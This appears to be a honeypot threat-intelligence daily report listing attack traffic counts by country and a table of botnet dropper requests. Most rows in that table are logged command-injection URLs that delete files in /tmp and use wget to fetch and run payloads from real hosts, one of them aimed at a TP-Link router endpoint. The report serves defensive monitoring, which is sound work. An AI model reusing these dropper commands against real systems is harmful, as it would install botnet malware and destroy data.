Report: 2025-07-07

Author: Shoggoth Industries
Daily Report: 2025-07-07

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 15 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 286 new requests that have never been observed before (these were added to the monitored request database).

A total of 1614 requests were recorded during the day, originating from 15 different countries, with a peak of 745 requests coming from SG.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
| --- | --- |
| KR | Germany |
| US | Germany |
| DE | Germany |
| US | Germany |
| US | Germany |
| US | Dubai |
| CN | Georgia |

botnet_dropper_behaviour

| remote_addr | request |
| --- | --- |
| 8.222.186.148 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |
| 118.193.61.245 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |
| 207.167.66.226 | `GET /shell.cgi?wget+http%3A%2F%2F195.26.230.140%2Fbot.arm%3Bchmod+%2Bx+bot.arm%3B.%2Fbot.arm+netwave HTTP/1.1` |
| 8.222.162.163 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |
| 8.222.145.211 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |
| 128.14.227.182 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |
| 47.236.247.145 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |
| 128.1.32.115 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |
| 8.222.132.133 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |
| 156.238.249.239 | `GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1` |
| 8.219.57.99 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |
| 121.237.177.84 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |
| 87.121.84.34 | `GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.234.135/x/tplink+-O-` |
| 41.238.44.147 | `GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1` |
| 182.42.156.162 | `GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1` |

request

The requests presented here are those that have not yet been integrated into the request database.


country_iso_code

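| number_of_occurence | country_iso_code |
| --- | --- |
| 745 | SG |
| 216 | US |
| 109 | CN |
| 84 | FR |
| 75 | DE |
| 73 | NL |
| 46 | SE |
| 38 | RU |
| 34 | SC |
| 27 | CA |
| 24 | JP |
| 22 | PL |
| 18 | BG |
| 12 | MT |
| 11 | AU |
| 9 | BR |
| 7 | GB |
| 6 | FI |
| 6 | BE |
| 6 | GH |
| 5 | UA |
| 4 | LT |
| 4 | KR |
| 3 | KZ |
| 3 | IN |
| 2 | AO |
| 2 | MM |
| 2 | ZA |
| 2 | TW |
| 2 | CO |
| 2 | AE |
| 2 | IE |
| 1 | RO |
| 1 | MU |
| 1 | ES |
| 1 | IL |
| 1 | PK |
| 1 | IR |
| 1 | CL |
| 1 | KH |
| 1 | AT |
| 1 | NG |
| 1 | EG |
| 1 | ID |
| 1 | AR |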
